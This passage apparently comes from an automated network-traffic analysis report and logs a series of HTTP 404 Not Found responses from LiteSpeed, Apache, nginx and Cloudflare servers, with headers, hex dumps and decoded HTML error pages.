22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Tue, 12 Nov 2024 06:55:29 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 06:55:35 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 06:55:38 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 06:55:41 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 06:55:43 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Tue, 12 Nov 2024 06:55:57 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-11-12T06:56:02.2907846Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 12 Nov 2024 06:56:05 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 12 Nov 2024 06:56:08 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 12 Nov 2024 06:56:11 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 12 Nov 2024 06:56:13 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 06:57:00 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1ukkx%2F9ugakJ%2FHR%2BTGnVHin7ZP5akkMd4Qt1Y4marDGnMgwOTFTAIeBI1dOfn9wyy%2FokbU2lk0gv%2B%2FCs97Wg%2FVqfHmG3Al0JDhorHiqOmDNS2H5MPjWqrH1U45QybRKW0jvpoGDlCA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e14a0155c7a2cbf-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1920&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=758&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 06:57:02 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5AvwUhyl9ckfC0CqiIBUYmwEnjkRU69KL%2BHnYO3WcTzwt5VUrTpwdwmt6FA8LgP7eDeemrJABiuPceWmF8atyJZ7jI%2FBiEZXDfQUs5vVDfJD3I84i3y1mwqEZCBG9bqpAwMfOmigFg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e14a0257a7b4754-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1172&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=778&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 06:57:05 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KWAqgLLjATnZI1LsJXDbl%2Fm3UbLECmwF5S9lKkJTMqvrNqwerxfG1Qve0hrdH8YIm7Czyuh3KKPKvaZYZ%2BgMw7r%2FoY1Uff9SF8QZAA0oRfv5iFbXcyOWNxmwsUUC%2BQgYIWAcl88wmQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e14a035a8066b5f-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1041&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1791&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 06:57:07 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5%2FtTcQkO7wrMhB6El%2BO2qsq7gAUj%2Bpc6m9P1lDO4Y8sZEmyksirF4kM5ddsprU5euiCMc%2F260D3wM%2FxOaDrmXDDDPXRrGsP1YrkTdhkd4tYr457u5g9IS%2F5wHXDiyEPYpGoUExVFfg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e14a0459923e857-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2329&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=495&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 06:57:14 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2P3uGwlRMfPcvKOdcd7dUIM1wgS6gqIWNqSAUmTpRAhqZJ96JBGXvW1XzvjR6fSFMKmcL41CAoGb3jklmIt%2FWFvp6XMlMvDJVXUmAhaWQO6b%2BYgGR1dnWAhFYihinNvLpJnT"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e14a06e1867e595-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: 